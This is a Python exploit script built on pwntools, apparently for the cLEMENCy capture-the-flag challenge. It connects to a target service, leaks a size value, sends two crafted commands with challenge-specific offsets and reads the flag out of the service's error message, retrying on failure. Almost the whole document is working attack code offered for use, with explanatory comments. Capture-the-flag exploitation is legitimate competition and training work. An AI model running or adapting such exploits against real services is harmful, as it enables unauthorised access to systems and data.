#!/usr/bin/env python
# coding:utf-8
import sys
import time
from pwn import *
from clemency import *
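def exploit(host, port=5050, attempts=100):
    """Leak the flag from the cLEMENCy challenge service at ``host:port``.

    Best-effort loop: connect, replay the three-step interaction, and return
    the line the service answers with. A failed attempt (connection error,
    unexpected reply) is retried until ``attempts`` connections have failed.

    Args:
        host: Target hostname or IP address.
        port: Target TCP port; the original script hard-coded 5050.
        attempts: Maximum number of connection attempts before giving up.

    Returns:
        The leaked flag as a string, or ``None`` when every attempt failed.
    """
    context.log_level = 'error'
    for _ in range(attempts):
        conn = None
        try:
            conn = remote(host, port)
            # cyio comes from the local ``clemency`` helper module; it is
            # assumed to proxy sendline/recvuntil on the underlying tube.
            p = cyio(conn, True)
            p.recvuntil('> ')
            # Step 1: obtain a size value from the service; every later
            # address is computed relative to it. The reply is attacker- /
            # remote-controlled, so a non-numeric line raises ValueError and
            # simply counts as a failed attempt.
            leak = hex(0xc400) + ' abs ps'
            p.sendline(leak)
            chunksize = int(p.recvuntil('\n').strip())
            p.recvuntil('> ')
            chunk_base = chunksize + 0xc400 - 1
            # Steps 2/3: two crafted commands. The constants 0x8713 and
            # 0x4010000 and the offsets 0x12 and 2233 + 1600 are
            # challenge-specific values carried over from the original
            # exploit; their derivation is not recorded here.
            p1 = hex(0x8713) + ' ' + hex(chunk_base + 0x12) + ' qq'
            p2 = hex(0x4010000) + ' ' + hex(chunk_base + 2233 + 1600) + ' qq +'
            # Effectively silenced by the 'error' log level set above; lower
            # the level to see the payloads while debugging.
            log.info(p1)
            log.info(p2)
            p.sendline('.')
            p.recvuntil('> ')
            p.sendline(p1)
            p.recvuntil('> ')
            p.sendline(p2)
            # The flag is read out of the service's own error message: the
            # exploit depends on an information leak through the
            # "[-] invalid: " error path, so only that prefix is stripped.
            flag = p.recvuntil('\n').strip().replace('[-] invalid: ', '')
            return flag
        except Exception:
            # Connection resets, EOF and garbled replies are expected on some
            # attempts; retry. The original bare ``except`` also swallowed
            # KeyboardInterrupt/SystemExit, which made Ctrl-C unusable.
            continue
        finally:
            # Release the socket on both the success and the failure path;
            # the original leaked one connection per retry.
            if conn is not None:
                conn.close()
    return None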
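if __name__ == '__main__':
    # Entry point: ``python exploit.py <host>``. Fail with a usage message
    # instead of an IndexError traceback when the host argument is missing.
    if len(sys.argv) != 2:
        sys.stderr.write('usage: %s <host>\n' % sys.argv[0])
        sys.exit(1)
    host = sys.argv[1]
    # Parenthesized form prints identically under Python 2 and 3.
    print(exploit(host))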